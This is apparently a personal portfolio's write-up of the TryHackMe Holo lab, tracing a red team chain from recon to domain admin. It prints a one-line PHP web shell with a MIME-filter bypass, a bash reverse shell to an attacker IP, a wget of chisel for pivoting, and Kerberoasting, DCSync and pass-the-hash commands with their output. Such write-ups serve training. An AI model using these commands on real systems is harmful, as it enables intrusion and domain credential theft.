[>_] Home [>_] Services [>_] Skills [>_] Certifications [>_] Experience [>_] Education [>_] Volunteering [>_] Projects [>_] Publications [>_] Writeups [>_] Contact
Red Teaming Advanced ★ Featured

TryHackMe – Holo Network: Full Red Team Engagement Writeup

End-to-end red team engagement — recon, web shell upload, internal pivoting, and Active Directory compromise via Kerberoasting.

March 30, 2026 · 18–22 min read
Active Directory Kerberoasting Pivoting TryHackMe

Overview

TryHackMe's Holo network is a full red team engagement spanning 4 machines with an Active Directory domain. This covers the complete chain from initial web shell upload to domain controller compromise.

Phase 1: External Recon

nmap -sV -sC -p- --min-rate 5000 10.200.95.33 -oN holo_external.txt

PORT     STATE SERVICE
22/tcp   open  ssh     OpenSSH 8.2p1
80/tcp   open  http    Apache 2.4.41
443/tcp  open  https   Apache 2.4.41
8080/tcp open  http    Node.js

Phase 2: Web Shell Upload

# Directory enumeration
gobuster dir -u http://10.200.95.33 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html

# Found: /upload.php [200]

# Bypass MIME-type filter with double extension
echo '<?php system($_GET["cmd"]); ?>' > shell.php.jpg

curl -X POST http://10.200.95.33/upload.php \
    -F "file=@shell.php.jpg;type=image/jpeg" -v

# Execute RCE
curl "http://10.200.95.33/uploads/shell.php.jpg?cmd=id"
# uid=33(www-data) gid=33(www-data)

Reverse Shell

# Attacker: start listener
nc -lvnp 4444

# Trigger via web shell
curl "http://10.200.95.33/uploads/shell.php.jpg?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/10.50.95.1/4444+0>%261'"

Phase 3: Internal Pivoting

# Upload chisel for SOCKS tunnel
wget http://10.50.95.1/chisel -O /tmp/chisel && chmod +x /tmp/chisel

# Attacker: chisel server
./chisel server -p 8888 --reverse

# Target: connect back
/tmp/chisel client 10.50.95.1:8888 R:socks

# Scan internal range via proxychains
proxychains nmap -sT -p 445,88,389,3389 10.200.95.0/24 --open
# 10.200.95.101 — DC01.holo.live (AD Domain Controller)

Phase 4: Kerberoasting → Domain Admin

# Extract Kerberoastable SPNs
proxychains python3 GetUserSPNs.py holo.live/svc_web:Password123 \
    -dc-ip 10.200.95.101 -request -outputfile hashes.txt

# Crack the hash
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
# svc_backup:Backup2026!

# DCSync with cracked credentials
proxychains python3 secretsdump.py holo.live/svc_backup:Backup2026!@10.200.95.101
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b

# Pass-the-hash → Domain Controller
proxychains python3 psexec.py -hashes :64f12cddaa88057e06a81b54e73b949b \
    Administrator@10.200.95.101

C:\> whoami
holo\administrator
C:\> type C:\Users\Administrator\Desktop\root.txt
THM{4d_c0mpr0m1s3d_h0l0_n3tw0rk}

Conclusion

The Holo chain demonstrated a realistic enterprise attack path: web RCE → network pivot → Kerberoasting → DCSync → domain admin. Service account passwords remain consistently weak — an issue that mirrors real enterprise environments.